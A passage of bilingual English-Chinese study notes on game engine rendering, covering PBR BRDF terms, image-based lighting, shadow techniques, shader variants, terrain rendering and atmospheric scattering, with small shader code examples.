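    float D_GGX(float NoH, float alpha)
    {
        float a2 = alpha * alpha;
        float d  = NoH * NoH * (a2 - 1.0) + 1.0;
        return a2 / (3.14159265 * d * d);
    }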

    Geometric Attenuation Term (self-shadowing)

    ​在计算机图形学中,几何衰减项(self-shadowing)是指在渲染过程中考虑物体自身阴影对光照效果的影响。当光线射向一个物体表面时,如果该表面的某些部分被遮挡,这些被遮挡的部分就会处于阴影之中,从而无法直接受到光的照射,导致其表面变暗。

    ​几何衰减项通常用于模拟光线在渲染过程中如何与物体表面相互作用,从而影响最终的光照结果。这种效应特别明显的情况是当光源和观察者之间有障碍物时,如一个物体投射的阴影落在自身表面上。

    ​几何衰减项可以通过各种方式来实现,其中一种常见的方式是使用阴影映射(shadow mapping)技术。在阴影映射中,首先从光源的视角渲染场景,并将渲染结果保存在一个深度贴图(depth map)中。然后,对于每个像素,通过比较深度贴图中的深度值来确定该像素是否在阴影之中。如果某个像素被深度贴图中的深度值所遮挡,那么该像素就被认为处于阴影之中,从而进行相应的颜色调整,实现几何衰减效果。

    webp

    $$\begin{gathered}
    f_{CookTorrance}=\frac{DFG}{4(\omega_o\cdot n)(\omega_i\cdot n)} \\
    G_{Smith}(l,\nu)=G_{GGX}(l)\cdot G_{GGX}(\nu) \\
    G_{GGX}(\nu)=\frac{n\cdot\nu}{(n\cdot\nu)(1-k)+k}\quad k=\frac{(\alpha+1)^{2}}{8}
    \end{gathered}$$

    // Geometry term: geometry masking/shadowing due to microfacets
    float G_GGX(float NdotV, float k) {
        return NdotV / (NdotV * (1.0 - k) + k);
    }

    float G_Smith(float NdotV, float NdotL, float roughness) {
        float k = pow(roughness + 1.0, 2.0) / 8.0;
        return G_GGX(NdotL, k) * G_GGX(NdotV, k);
    }

    Fresnel Equation

    ​当视角接近反射平面时,反射率会急剧上升。

    webp

    $$\begin{aligned}&f_{CookTorrance}=\frac{DFG}{4(\omega_{o}\cdot n)(\omega_{i}\cdot n)}\\&F_{Schlick}(h,\nu,F_{0})=F_{0}+(1-F_{0})\left(1-(\nu\cdot h)\right)^{5}\end{aligned}$$

    ​这个 5 次方是数学家推导出来的。

    // Fresnel term with scalar optimization
    float F_Schlick(float VoH, float f0) {
        float f = pow(1.0 - VoH, 5.0);
        return f0 + (1.0 - f0) * f;
    }
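
    ​把 D、G、F 三项代回 Cook-Torrance 公式,就得到完整的镜面 BRDF(GLSL 示意,沿用上文的 D_GGX 与 G_Smith;向量版 Fresnel 为假设写法):

    vec3 cookTorranceSpecular(vec3 N, vec3 V, vec3 L, float roughness, vec3 F0)
    {
        vec3  H   = normalize(V + L);
        float NoV = max(dot(N, V), 1e-4); // 防止除零
        float NoL = max(dot(N, L), 1e-4);
        float NoH = max(dot(N, H), 0.0);
        float VoH = max(dot(V, H), 0.0);

        float D = D_GGX(NoH, roughness * roughness);     // 法线分布
        float G = G_Smith(NoV, NoL, roughness);          // 几何遮蔽
        vec3  F = F0 + (1.0 - F0) * pow(1.0 - VoH, 5.0); // Fresnel(Schlick)

        return D * G * F / (4.0 * NoV * NoL);
    }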

    Physical Measured Material

    webp

    MERL BRDF Database of measured materials

    ​这个数据集测量了各种材质的数据。

    Disney Principled BRDF

    Principles to follow when implementing model:

    ​实施模型时应遵循的原则:

    • Intuitive rather than physical parameters should be used

      应使用直观参数而不是物理参数

    • There should be as few parameters as possible

      参数应该尽可能少

    • Parameters should be zero to one over their plausible range

      参数在其合理范围内应为 0 到 1

    • Parameters should be allowed to be pushed beyond their plausible range where it makes sense

      在有意义的情况下,应允许参数被推到合理范围之外

    • All combinations of parameters should be as robust and plausible as possible

      所有参数组合应尽可能稳健且合理

    Disney Principle Material Parameters

    ​Disney Principled BRDF 是迪士尼(Disney)开发的一种基于物理的渲染表面模型,用于在计算机图形学中模拟材质的外观。BRDF 是 Bidirectional Reflectance Distribution Function 的缩写,用于描述光线从表面反射的方式。Disney Principled BRDF 将多个常见的渲染表面模型(如 Lambert、Blinn-Phong、Cook-Torrance 等)融合成一个单一的、参数化的模型,使得艺术家和技术人员可以更简单地控制材质的外观,并且更好地满足物理真实性的要求。

    ​Disney Principled BRDF 的主要特点和参数包括:

    1. 基础颜色(Base Color): 表示表面的颜色,即在没有其他光照影响的情况下表面的颜色。

    2. 金属度(Metallic): 表示表面是否具有金属质感。金属度为 0 表示非金属材质,金属度为 1 表示完全是金属材质。

    3. 粗糙度(Roughness): 表示表面的光滑程度。粗糙度为 0 表示表面非常光滑,反射光线呈现清晰的镜面反射,而粗糙度为 1 表示表面非常粗糙,反射光线呈现模糊的散射。

    4. 法线(Normal): 表示表面的法线方向,用于模拟表面的微观凹凸结构。

    5. 环境遮挡(Ambient Occlusion): 用于模拟光线在表面附近的阴影效果,增强表面的立体感。

    ​Disney Principled BRDF 的优点在于它简化了材质创建的流程,减少了需要调整的参数数量,同时也更符合物理真实性。通过调整基础颜色、金属度和粗糙度等参数,可以实现多种不同类型材质的外观,包括金属材质、塑料、玻璃等。

    ​这种模型的广泛应用使得它成为了许多计算机图形学软件和引擎中的标准渲染模型之一,例如 Pixar 的 RenderMan、Blender 内置的 Cycles 渲染引擎等。

    webp

    PBR Specular Glossiness

    ​Specular Glossiness(高光光泽度)是一种用于描述材质表面反射特性的属性。它通常被用于渲染引擎和材质编辑器中,用于控制物体表面的光泽程度以及高光的大小和清晰度。

    webp

    webp

    PBR Metallic Roughness

    ​Metallic Roughness 是一种用于描述材质外观的参数化模型,通常用于计算机图形学中的渲染。它是 Disney Principled BRDF 中的两个主要参数之一,用于控制材质的金属度和粗糙度,从而影响表面的反射和散射行为。

    1. 金属度(Metallic): 这个参数表示表面材质的金属属性程度。金属度为 0 表示非金属材质,例如塑料、木材等,而金属度为 1 表示完全是金属材质,例如铁、铜等。金属材质具有较强的镜面反射特性,因此在光照下会产生清晰的高光反射,而非金属材质则通常具有更多的漫反射。
    2. 粗糙度(Roughness): 这个参数表示表面的光滑程度。粗糙度为 0 表示表面非常光滑,反射光线呈现清晰的镜面反射,而粗糙度为 1 表示表面非常粗糙,反射光线呈现模糊的散射。具有较高粗糙度的表面会导致光线在各个方向上散射,产生柔和的光照效果,而较低粗糙度的表面则会产生更锐利的反射光线。

    webp

    Convert MR to SG

    webp

    PBR Pipeline MR vs SG

    webp

    MR

    • Pros

      • Can be easier to author and less prone to errors caused by supplying incorrect dielectric F0 data

        可以更轻松地编写,并且不易因提供不正确的介电 F0 数据而导致错误

      • Uses less texture memory, as metallic and roughness are both grayscale maps

        使用更少的纹理内存,因为金属和粗糙度都是灰度图

    • Cons

      • No control over F0 for dielectrics in map creation. However, most implementations have a specular control to override the base 4% value

        制作贴图时无法控制电介质的 F0。不过,大多数实现都提供镜面反射控制项来覆盖 4% 的基础值

      • Edge artifacts are more noticeable, especially at lower resolutions

        边缘伪影更明显,尤其是在较低分辨率下

    SG

    • Pros

      • Edge artifacts are less apparent

        边缘伪影不太明显

      • Control over dielectric F0 in the specular map

        控制镜面反射图中的电介质 F0

    • Cons

      • Because the specular map provides control over dielectric F0, it is more susceptible to use of incorrect values. It is possible to break the law of energy conservation if handled incorrectly in the shader

        由于镜面反射贴图提供对电介质 F0 的控制,因此更容易被填入不正确的值。如果在着色器中处理不当,可能会违反能量守恒定律

      • Uses more texture memory with an additional RGB map

        使用更多纹理内存和额外的 RGB 贴图

    Image-Based Lighting (IBL)

    Basic Idea of IBL

    ​IBL(Image-Based Lighting)是一种计算机图形学中常用的光照技术,用于模拟真实世界中的光照效果。它基于图像的方式来描述光照信息,通过对环境中的光照进行捕捉和处理,来为场景中的物体赋予逼真的光照效果。

    ​IBL 的基本原理是利用环境贴图(Environment Map)来模拟环境中的光照。环境贴图通常是一个球形或立方体贴图,捕捉了环境中的光照信息,包括天空、周围物体的反射等。这些贴图可以是基于真实场景拍摄的全景图像,也可以是通过计算得到的环境光照信息。

    webp

    • An image representing distant lighting from all directions.

      一张代表来自各个方向的远处光照的图像。

    • How to shade a point under the lighting?

      如何在灯光下对点进行着色?

      Solving the rendering equation:

      求解渲染方程:

      $L_{o}(x,\omega_{o})=\int_{H^{2}}f_{r}(x,\omega_{o},\omega_{i})L_{i}(x,\omega_{i})\cos\theta_{i}d\omega_{i}$

    • Using Monte Carlo integration

      使用蒙特卡罗积分

      Large amount of sampling - Slow!

      采样量大,很慢!

    webp

    Recall BRDF Function

    $$L_{o}(\boldsymbol{x},\omega_{o})=\int_{H^{2}}f_{r}(\boldsymbol{x},\omega_{o},\omega_{i})L_{i}(\boldsymbol{x},\omega_{i})\cos\theta_{i}d\omega_{i}$$

    $$f_{r}=k_{d}f_{Lambert}+f_{CookTorrance}$$

    • $f_{Lambert}$ diffuse
    • $f_{CookTorrance}$ specular

    $$\begin{aligned}
    L_{o}(x,\omega_{o})&=\int_{H^{2}}(k_{d}f_{Lambert}+f_{CookTorrance})L_{i}(x,\omega_{i})\cos\theta_{i}d\omega_{i} \\
    &=\int_{H^{2}}k_{d}f_{Lambert}L_{i}(x,\omega_{i})\cos\theta_{i}d\omega_{i}+\int_{H^{2}}f_{CookTorrance}L_{i}(x,\omega_{i})\cos\theta_{i}d\omega_{i} \\
    &=L_{d}(x,\omega_{o})+L_{s}(x,\omega_{o})
    \end{aligned}$$

    Diffuse Irradiance Map

    • Irradiance Map

    webp

    Specular Approximation

    webp

    Approximation: part (1/2)

    webp

    Approximation: part (2/2)

    webp

    Quick Shading with Precomputation

    ​通过预计算进行快速着色

    webp
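
    ​预计算完成后,运行时的镜面 IBL 只剩两次贴图采样(split-sum 近似的 GLSL 示意,贴图与命名均为假设):

    uniform samplerCube prefilteredEnv; // 按 roughness 预卷积,存于各级 mip
    uniform sampler2D   brdfLUT;        // (NoV, roughness) -> (A, B)
    uniform float       maxMipLevel;

    vec3 iblSpecular(vec3 N, vec3 V, vec3 F0, float roughness)
    {
        vec3 R = reflect(-V, N);
        vec3 prefiltered = textureLod(prefilteredEnv, R, roughness * maxMipLevel).rgb;
        vec2 ab = texture(brdfLUT, vec2(max(dot(N, V), 0.0), roughness)).rg;
        return prefiltered * (F0 * ab.x + ab.y);
    }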

    Shading PBR with IBL

    ​加入环境贴图后,效果更加真实。

    webp

    Classic Shadow Solution

    Big World and Cascade Shadow

    webp

    • Partition the frustum into multiple frustums

      将视锥体划分为多个视锥体

    • A shadow map is rendered for each sub frustum

      为每个子视锥体渲染阴影贴图

    • The pixel shader then samples from the map that most closely matches the required resolution

      像素着色器然后从与所需分辨率最匹配的贴图中进行采样

    Steps of Cascade Shadow

    ​级联阴影的步骤

    ​Cascade Shadow Mapping(级联阴影映射)是一种用于实时渲染中实现高质量阴影的技术。它被广泛应用于游戏引擎和其他实时渲染应用程序中,以提供更逼真的场景光照效果。

    ​Cascade Shadow Mapping 的基本思想是将场景中的光源视锥体(例如平行光源的视锥体)分成多个不同分辨率的子区域,每个子区域被称为一个级联(cascade)。然后,为每个级联计算一个独立的深度贴图(depth map),用于记录从光源视角下每个像素到场景中可见点的距离。

    ​通常,级联的数量和分辨率会根据距离光源的远近而动态调整,以确保远处的物体能够得到足够高的深度分辨率,从而减少阴影的锯齿状边缘(aliasing),同时避免过度消耗资源。通常情况下,近处级联具有更高的分辨率,而远处级联具有较低的分辨率。

    ​一旦每个级联的深度贴图都准备好了,就可以在渲染阴影的阶段使用它们。具体来说,对于每个要接受阴影的像素,都会根据其在世界空间中的位置和光源的视角来计算其在每个级联深度贴图中的深度值。然后,通过比较每个像素的深度值与相应级联深度贴图中的深度值,就可以确定像素是否在阴影中。

    webp

    splitFrustumToSubfrusta();
    calculateOrthoProjectionsForEachSubfrustum();
    renderShadowMapForEachSubfrustum();
    renderScene();

    vs_main() {
        calculateWorldPosition()
    }

    ps_main() {
        transformWorldPositionsForEachProjections()
        sampleAllShadowMaps()
        compareDepthAndLightingPixel()
        ...
    }

    Blend between Cascade Layers

    ​级联层之间的混合

    webp

    1. A visible seam can be seen where cascades overlap between cascade layers, because the resolution does not match

      由于分辨率不匹配,级联层重叠处可以看到明显的接缝

    2. The shader then linearly interpolates between the two values based on the pixel’s location in the blend band

      因此,着色器根据像素在混合带中的位置,在两层的值之间进行线性插值

    Pros and Cons of Cascade Shadow

    • Pros

      • best way to fix the most prevalent error with shadowing: perspective aliasing

        解决最常见阴影错误(透视走样)的最佳方法

      • fast to generate depth map, 3x up when depth writing only

        快速生成深度图,仅深度写入时提高 3 倍

      • provide fairly good results

        提供相当好的结果

    • Cons

      • Nearly impossible to generate high quality area shadows

        几乎不可能生成高质量的区域阴影

      • No colored shadows. Translucent surfaces cast opaque shadows

        没有彩色阴影。半透明表面投射不透明阴影

    Hard Shadow vs Realistic Shadow

    webp

    PCF - Percentage Closer Filter

    ​PCF - 百分比接近过滤器

    ​PCF(Percentage Closer Filter)是一种用于改善阴影质量的技术,特别是在阴影映射中使用。它的目的是减少阴影边缘的锯齿(aliasing),使阴影更加柔和和逼真。

    ​阴影映射通常会生成一个深度贴图(depth map),用于记录从光源视角下到场景中各个点的距离。在渲染场景时,为了确定一个像素是否在阴影中,通常会比较场景中的点与光源的深度值。然而,简单地使用深度比较可能会导致锯齿状边缘,特别是在阴影投射到接近相机的表面上时。

    ​PCF 解决了这个问题。它通过对深度贴图中的深度值进行多次采样,并计算每次采样时像素与深度值的关系,以确定像素是否在阴影中。这些采样通常是在深度贴图的附近进行的,并且通常是在一个较小的范围内。这样,即使像素与阴影边缘接近,也能够准确地检测出阴影的存在,从而减少锯齿状边缘的问题。

    webp

    • Target problem

      目标问题

      • The shadows that result from shadow mapping aliasing is serious

        阴影贴图锯齿导致的阴影很严重

    • Basic idea

      基本思想

      • Sample from the shadow map around the current pixel and compare its depth to all the samples

        从当前像素周围的阴影贴图进行采样,并将其深度与所有样本进行比较

      • By averaging out the results we get a smoother line between light and shadow

        通过对结果进行平均,我们可以得到光影之间更平滑的过渡(下面给出一个 3x3 PCF 的示意)
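
    ​一个 3x3 PCF 的直接实现大致如下(GLSL 示意,假设 shadow map 中存的是归一化深度):

    uniform sampler2D shadowMap;
    uniform vec2 shadowTexelSize; // (1/width, 1/height)

    float pcf3x3(vec2 uv, float receiverDepth)
    {
        float lit = 0.0;
        for (int x = -1; x <= 1; ++x)
            for (int y = -1; y <= 1; ++y)
            {
                float blockerDepth = texture(shadowMap, uv + vec2(x, y) * shadowTexelSize).r;
                lit += (receiverDepth <= blockerDepth) ? 1.0 : 0.0;
            }
        return lit / 9.0; // 0 为全阴影,1 为全亮,中间值形成柔和边缘
    }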

    PCSS - Percentage Closer Soft Shadow

    ​PCSS - 百分比接近软阴影

    ​Percentage Closer Soft Shadow(PCSS)是一种用于实时渲染中生成柔和阴影的技术。它是 Percentage Closer Filter(PCF)的一种变体,旨在在阴影边缘产生更加柔和和逼真的效果。

    ​PCSS 通过在每个像素处进行多个样本的深度比较,并根据深度比较结果和光源距离来计算阴影的柔和度。与传统的硬阴影相比,PCSS 考虑了阴影边缘周围的光线传播和遮挡,以模拟真实世界中光线的衍射和散射效应。

    PCSS 的实现通常包括以下步骤:

    1. 生成阴影贴图(Shadow Map): 首先,生成场景的深度贴图,用于记录从光源视角下到场景中各个点的距离。
    2. 多样本采样: 在渲染阶段,对于每个要接受阴影的像素,进行多个样本的深度比较。这些样本通常位于阴影边缘周围,并且可以通过多次采样来模拟光线的传播。
    3. 计算柔和阴影: 根据每个样本的深度比较结果以及光源与表面的距离,计算阴影的柔和度。通常,较远离光源的像素会产生较宽的阴影区域,而较接近光源的像素会产生较窄的阴影区域。
    4. 混合阴影: 将多个样本的阴影值进行加权平均,以获得最终的柔和阴影结果。这样可以使阴影边缘呈现出逐渐变化的过渡效果,减少锯齿状边缘。

    webp

    • Target problem

      目标问题

      • Suffers from aliasing and under sampling artifacts

        存在混叠和采样不足的问题

    • Basic idea

      基本思想

      • Search the shadow map and average the depths that are closer to the light source

        搜索阴影贴图并平均靠近光源的深度

      • Using a parallel planes approximation

        使用平行平面近似

    Variance Soft Shadow Map

    webp

    • Target problem

      目标问题

      • Rendering plausible soft shadow in real-time

        实时渲染合理的软阴影

    • Basic idea

      基本思想

      • Based on Chebyshev’s inequality, using the average and variance of depth, we can approximate the percentage of depth distribution directly instead of comparing a single depth to a particular region (PCSS)

        基于切比雪夫不等式,使用深度的平均值和方差,我们可以直接近似深度分布的百分比,而不是像 PCSS 那样将单个深度与特定区域逐一比较(不等式形式见下)
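
    ​其中用到的单边切比雪夫不等式为($\mu$、$\sigma^2$ 是滤波窗口内深度的均值和方差,可由深度图及其平方图直接滤波得到):

    $$P(z\ge t)\le p_{max}(t)=\frac{\sigma^{2}}{\sigma^{2}+(t-\mu)^{2}},\quad t>\mu,\quad \mu=E[z],\ \sigma^{2}=E[z^{2}]-E[z]^{2}$$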

    ​目前 3A 渲染广泛用到的技术:

    • Lightmap + Light probe
    • PBR + IBL
    • Cascade shadow + VSSM

    Moving Wave of High Quality

    Quick Evolving of GPU

    ​得益于 GPU 的发展,计算能力不断增强。

    • More flexible new shader model

      更灵活的新着色器模型

      • Compute shader

        计算着色器

      • Mesh shader

        网格着色器

      • Ray-tracing shader

        光线追踪着色器

    • High performance parallel architecture

      高性能并行架构

      • Warp or wave architecture

        Warp / Wave 架构(GPU 线程束)

    • Fully opened graphics API

      完全开放的图形 API

      • DirectX 12 and Vulkan

        DirectX 12 和 Vulkan

    Real-Time Ray-Tracing on GPU

    webp

    ​新的 GPU 支持实时光线追踪。

    Real-Time Global Illumination

    webp

    More Complex Material Model

    webp

    Virtual Shadow Maps

    webp

    Shader Management

    Ocean of Shaders

    ​大游戏里用到的 Shader 非常多。

    Blow of Shaders

    ​每一帧都需要执行场景中大量不同的 shader。

    Artist Create infinite More Shaders

    ​艺术家创造无限更多的着色器

    Uber Shader and Variants

    ​Uber 着色器和变体

    A combination of shader for all possible light types, render passes and material types

    ​适用于所有可能的灯光类型、渲染通道和材质类型的着色器组合

    • Shared many state and codes

      共享许多状态和代码

    • Compile to many variant short shaders by pre-defined macro

      通过预定义宏编译为许多变体短着色器

    // sky light
    #if ENABLE_SKY_LIGHT
    #if MATERIAL_TWOSIDED && LQ_TEXTURE_LIGHTMAP
    if (NoL == 0) {
    #endif

    #if MATERIAL_SHADINGMODEL_SINGLELAYERWATER
    ShadingModelContext.WaterDiffuseIndirectLuminance += SkyDiffuseLighting;
    #endif

    Color += SkyDiffuseLighting * half3(ResolvedView.SkyLightColor.rgb) * ShadingModelContext.DiffuseColor * MaterialAO;
    #if MATERIAL_TWOSIDED && LQ_TEXTURE_LIGHTMAP
    }
    #endif
    #endif

    Shader Variants Example In Real Game

    ​真实游戏中的着色器变体示例

    webp

    ​一大堆。为了降低耦合性,每个 shader 都是单独存在的。

    Cross Platform Shader Compile

    webp

    ​写 shader 也演变出了一堆语言!

    第六节(上):游戏中地形大气和云的渲染

    ​MD 天书……

    Rendering on Game Engine

    The Challenges and Fun of Rendering the Beautiful Mother Nature

    ​渲染美丽大自然的挑战和乐趣

    Real-World Landscape

    webp

    • Huge geospatial scale

      巨大的地理空间尺度

    • Rich geomorphological

      地貌丰富

      • Vegetation

        植被

      • Rivers

        河流

      • Undulating peaks

        起伏的山峰

      • Alpine snow

        高山雪

    Too Complex for Rendering Using Traditional Mesh + Material

    ​使用传统网格 + 材质渲染过于复杂

    Environment Components in Games

    webp

    Simple Idea - Heightfield

    webp

    Height Map

    ​高度图

    Contour Map

    ​等高线图

    • Satellite image and google earth

      卫星图像和谷歌地球

    Expressive Heightfield Terrains

    ​富有表现力的高度场地形

    Render Terrain with Heightfield

    ​使用高度场渲染地形

    webp

    Adaptive Mesh Tessellation

    ​自适应网格细分

    webp

    ​FOV 内的网格密集,FOV 外的稀疏。

    Two Golden Rules of Optimization

    ​两条优化黄金法则

    webp

    View-dependent error bound

    ​与视点相关的误差上界

    • Distance to camera and FoV

      到相机和 FoV 的距离

    • Error compare to ground truth (pre-computation)

      与真实情况相比的误差(预计算)

    Triangle-Based Subdivision

    ​基于三角形的细分

    webp

    Subdivision and T-Junctions

    ​T-Junctions(T 字连接)是在计算机图形学中用于描述三角形网格连接关系的术语。当两个或多个三角形共享一个边时,它们在连接点形成了 T 字型的结构。这种连接在三维网格模型的拓扑结构中相当常见。

    ​T-Junctions 通常出现在网格的边缘、拐角或交叉点附近。它们可能会出现在几何体的建模、网格编辑、或者在进行几何操作(如网格合并、分割、细分等)时。在渲染阶段,T-Junctions 可能会导致一些问题,尤其是在基于三角形的图形渲染中,因为它们可能会导致不正确的图形拓扑和渲染结果。

    webp

    Continuously partitioning triangles and their children based on the idea of binary trees

    ​基于二叉树的思想连续划分三角形及其子节点

    Triangle-Based Subdivision on GPU

    webp

    54 x 54 km terrain on GPU using Unity game engine

    ​一个针对 GPU 架构设计的算法:用 Unity 引擎在 GPU 上细分 54 x 54 km 的地形。

    QuadTree-Based Subdivision

    ​基于四叉树的细分

    webp

    Pros

    • Easy to construct

      易于建造

    • Easy management of data under geospatial, including objects culling and data streaming

      轻松管理地理空间下的数据,包括对象剔除和数据流

    Cons

    • Mesh subdivision is not as flexible as triangle mesh

      网格细分不如三角形网格灵活

    • The grid level of the leaf nodes needs to be consistent

      叶子节点的网格层级需要一致

    webp

    Solving T-Junctions among Quad Grids

    ​求解四边形网格之间的 T 型连接点

    webp

    Terrain Rendering with Quad Grid

    ​使用四网格进行地形渲染

    Triangulated Irregular Network (TIN)

    ​不规则三角网(TIN)

    webp

    Density Variants in TIN

    ​TIN 中的密度变化

    webp

    Triangulated Irregular Network vs. Adaptive Tessellation

    ​不规则三角网与自适应曲面细分的比较

    webp

    Pros

    • Easy in runtime rendering

      运行时渲染简单

    • Fewer triangles in certain terrain types

      某些地形类型中的三角形较少

    webp

    Cons

    • Requires certain pre-processing steps

      需要一定的预处理步骤

    • Poor reusability

      可重用性差

    GPU-Based Tessellation

    ​基于 GPU 的曲面细分

    webp

    Hardware Tessellation

    ​硬件曲面细分

    webp

    Hull-Shader Stage - transforms basis functions from base mesh to surface patches

    Hull-Shader Stage - 将基函数从基础网格变换到表面补丁

    Tessellator Stage - produces a semi-regular tessellation pattern for each patch

    Tessellator Stage - 为每个补丁生成半规则的镶嵌图案

    Domain-Shader Stage - a programmable shader stage that calculates the vertex position that corresponds to each domain sample

    Domain-Shader Stage - 一个可编程着色器阶段,用于计算与每个域样本对应的顶点位置

    webp

    Mesh Shader Pipeline

    webp

    • Amplification Shader Stage - decides how many Mesh shader groups to run and passes data to those groups

      放大着色器阶段 - 决定运行多少个网格着色器组并将数据传递到这些组

    • Mesh Shader Stage - produces a semi-regulartessellation pattern for each patch, and outputscomprise vertices and primitives

      网格着色器阶段 - 为每个补丁生成半规则曲面细分图案,输出包含顶点和图元

    Real-Time Deformable Terrain

    webp

    ​在游戏运行时,地表模型会改变(如车压路上)

    Dig a Hole in Terrain

    webp

    ​给地表挖洞。

    Crazy Idea - Volumetric Representation

    ​疯狂的想法-体积表示

    webp

    In 3D computer graphics, a voxel represents a value on a regular grid in three-dimensional space. As with pixels in a 2D bitmap, voxels themselves do not typically have their position (i.e. coordinates) explicitly encoded with their values

    ​在 3D 计算机图形学中,体素表示三维空间中规则网格上的值。与 2D 位图中的像素类似,体素本身通常不会把自己的位置(即坐标)随其值显式编码

    Marching Cubes

    ​行进立方体

    webp

    ‘Marching Cubes: A High Resolution 3D Surface Construction Algorithm’, Computer Graphics, Volume 21, Number 4, July 1987

    ​给模型作切片,再对每个体素内的等值面做三角化。

    Transition Cell Lookup Table

    ​过渡单元查找表

    webp

    webp

    Transvoxel Algorithm

    ​跨体素算法

    • Constructs the triangulation of transition cells to form a lookup table, and uses this lookup table to do the triangulation of LOD voxel cubes

      构造过渡单元的三角剖分以形成查找表,并使用该查找表进行 LOD 体素立方体的三角剖分

    Make AAA as Flexible as Minecraft??? :-)

    ​我的世界是一个自由度很高的游戏,目前 3A 大作很难对场景环境做出改变。

    Terrain Materials

    webp

    ​一个 Terrain 往往包含多种 Materials。

    Simple Texture Splatting

    ​简单的纹理喷溅

    webp

    float3 blend(float4 texture1, float a1, float4 texture2, float a2) {
        return texture1.rgb * a1 + texture2.rgb * a2;
    }

    ​terrain 上的纹理从一个过渡到另一个时,如果简单地使用混合,则平滑但不自然。

    Advanced Texture Splatting

    webp

    float3 blend(float4 texture1, float height1, float4 texture2, float height2) {
        return height1 > height2 ? texture1.rgb : texture2.rgb;
    }

    ​根据高度图实现材质的过渡。

    Advanced Texture Splatting - Biased

    webp

    ​引入 Height Bias。

    float3 blend(float4 texture1, float height1, float4 texture2, float height2) {
        float depth = 0.2;
        float ma = max(texture1.a + height1, texture2.a + height2) - depth;
        float b1 = max(texture1.a + height1 - ma, 0);
        float b2 = max(texture2.a + height2 - ma, 0);
        return (texture1.rgb * b1 + texture2.rgb * b2) / (b1 + b2);
    }

    Sampling from Material Texture Array

    ​从材质纹理数组采样

    webp

    Parallax and Displacement Mapping

    ​视差和位移贴图

    webp

    Parallax Mapping: Due to the height of the surface, the eye sees point B instead of point A. It creates a sense of dimensionality.

    ​视差映射:由于表面的高度,眼睛看到的是 B 点而不是 A 点,从而营造出立体感。

    Expensive Material Blending

    webp

    • Many Texturing - Low performance when multiple materials are sampled too many times

      大量纹理采样 - 对多种材质采样太多次时性能较低

    • Huge Splat Map - We only see a small set of terrain, but we load splat maps for 100 square km into video memory

      巨大的 Splat Map - 我们只能看到一小块地形,却要把 100 平方公里的 Splat Map 加载进显存

    Virtual Texture

    ​虚拟纹理(Virtual Texture)是一种用于实时图形渲染的技术,旨在解决在有限的显存中管理大量纹理数据的挑战。传统上,图形渲染中使用的纹理数据通常是预加载到显存中的,但这种方法在需要处理大规模纹理数据时会遇到限制,尤其是在高分辨率的场景中。

    ​虚拟纹理通过将纹理数据分割成较小的块,并根据视野和需求动态地加载和卸载这些块,以优化显存利用率并允许处理大规模纹理数据。虚拟纹理技术的核心思想是将纹理数据存储在较大的物理存储介质(如硬盘或固态硬盘)中,然后根据需要将其部分加载到显存中供渲染使用。

    webp

    • Build a virtual indexed texture to represent all blended terrain materials for whole scene

      构建虚拟索引纹理来表示整个场景的所有混合地形材质

    • Only load materials data of tiles based on view-depend LOD

      仅根据视图相关的 LOD 加载图块的材质数据

    • Pre-bake materials blending into tile and store them into physical textures

      将材质混合预烘焙到图块(tile)中,并存储到物理纹理里

    VT implementation, DirectStorage & DMA

    ​VT 实现、DirectStorage 和 DMA

    webp

    Floating-point Precision Error

    ​浮点精度误差

    webp

    ​计算中 float 的精度可能不够,导致很远的物体会出现波动。

    Camera-Relative Rendering

    webp

    • Translates objects by the negated world space camera position before any other geometric transformations affect them

      在任何其他几何变换作用之前,先将对象按相机世界坐标取负后的量进行平移

    • It then sets the world space camera position to 0 and modifies all relevant matrices accordingly

      然后将世界空间相机位置设为 0,并相应地修改所有相关矩阵(见下方示意)
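
    ​落实到代码上,就是在上传矩阵前把平移部分减去相机位置(示意;实际引擎通常在 CPU 侧用双精度保存世界坐标,相减后再转单精度):

    // 把物体的世界矩阵改写为“相机相对”矩阵
    mat4 makeCameraRelative(mat4 worldFromObject, vec3 cameraPosWS)
    {
        worldFromObject[3].xyz -= cameraPosWS; // 第 4 列是平移
        return worldFromObject;
    }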

    Integration with other world elements (rocks, trees, grass)

    ​与其他世界元素(岩石、树木、草)的融合

    Tree Rendering

    webp

    ​近处树模型复杂,远处简单

    Decorator Rendering

    webp

    ​装饰渲染。近处复杂,远处简单

    Road and Decals Rendering

    ​道路和贴花渲染

    webp

    Terrain Editing in Game Engine、Procedural Terrain Creation……

    第六节(下):游戏中地形大气和云的渲染

    Sky and Atmosphere

    How to “Paint” Everything in the Sky

    webp

    ​主要讲渲染天空和云。

    Atmosphere

    Analytic Atmosphere Appearance Modeling

    ​大气外观分析建模

    webp

    $$\mathbb{F}(\theta,\gamma)=\left(1+Ae^{\frac{B}{\cos\theta+0.01}}\right)\cdot\left(C+De^{E\gamma}+F\cos^{2}\gamma+G\cdot\chi(H,\gamma)+I\cdot\cos^{\frac{1}{2}}\theta\right)$$

    $$L_{\lambda}=\mathbb{F}(\theta,\gamma)\cdot L_{M\lambda}$$

    用这么个方程就表示了整个大气外观!

    Pros

    • Calculation is simple and efficient

      计算简单高效

    Cons

    • Limited to ground view

      仅限地面视图

    • Atmosphere parameters can’t be changed freely

      气氛参数不能随意更改

    Participating Media

    ​参与介质

    webp

    Volume filled with particles

    ​充满颗粒的体积

    Interact differently with light depending on its composition

    ​根据其成分的不同,与光发生不同的相互作用

    How Light Interacts with Participating Media Particles?

    ​光如何与参与的介质粒子相互作用?

    webp

    • Absorption

      吸收

    • Out-scattering

      外散射

    • Emission

      自发光(发射)

    • In-scattering

      内散射

    Volume Rendering Equation (VRE)

    ​体绘制方程 (VRE)

    webp

    $$L(P,\omega)=\int_{x=0}^{d}T(x)[\sigma_{a}\cdot L_{e}(x,\omega)+\sigma_{s}\cdot L_{i}(x,\omega)]dx+T(M)L(M,\omega)$$

    $$T(x)=e^{-\int_{x}^{P}\sigma_{t}(s)ds}$$

    Transmittance: the net reduction factor from absorption and out-scattering

    ​透射率:吸收和外散射的净减少因子

    $$L_{i}(x,\omega)=\int_{S^{2}}f_{p}(x,\omega,\omega^{\prime})L(x,\omega^{\prime})d\omega^{\prime}$$

    The net increase factor from in-scattering

    ​内散射的净增加因子

    Real Physics in Atmosphere

    webp

    学习计算机图形学还要对气象学有所涉猎!

    Scattering Types

    ​散射类型

    webp

    • Rayleigh Scattering

      瑞利散射

      Scattering of light by particles that have a diameter much smaller than the wavelength of the radiation (eg. air molecules)

      直径远小于辐射波长的粒子(例如空气分子)对光进行散射

    • Mie scattering

      米氏散射

      Scattering of light by particles that have a diameter similar to or larger than the wavelength of the incident light (eg. aerosols)

      直径类似于或大于入射光波长的颗粒(例如气溶胶)对光进行散射

    Rayleigh Scattering

